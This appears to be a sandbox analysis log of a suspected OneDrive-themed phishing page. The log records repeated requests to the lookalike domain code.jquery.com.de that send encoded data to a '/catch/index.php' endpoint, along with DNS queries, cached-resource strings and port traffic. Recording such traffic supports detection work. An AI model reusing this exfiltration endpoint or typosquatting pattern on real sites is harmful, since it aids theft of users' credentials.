Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: grtt.vantechdns.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com.de

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 19 Jan 2025 23:19:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-Encoding

Source: chromecache_79.3.dr	String found in binary or memory: http://localhost/ali/new/assets/favicon.ico
Source: chromecache_79.3.dr	String found in binary or memory: https://code.jquery.com.de/jquery-3.5.1.min.js
Source: chromecache_73.3.dr	String found in binary or memory: https://fonts.googleapis.com
Source: chromecache_73.3.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Fredoka&display=swap
Source: chromecache_73.3.dr	String found in binary or memory: https://fonts.gstatic.com
Source: chromecache_60.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3O8SL8E-mKpNk.
Source: chromecache_60.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3O8SL8EemK.wof
Source: chromecache_60.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/fredoka/v14/X7nP4b87HvSqjb_WIi2yDCRwoQ_k7367_B-i2yQag0-mac3O8SL8H-mKpNk.
Source: chromecache_73.3.dr	String found in binary or memory: https://onedrive.live.com/
Source: chromecache_73.3.dr	String found in binary or memory: https://p.sfx.ms/images/mask_icon.svg

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
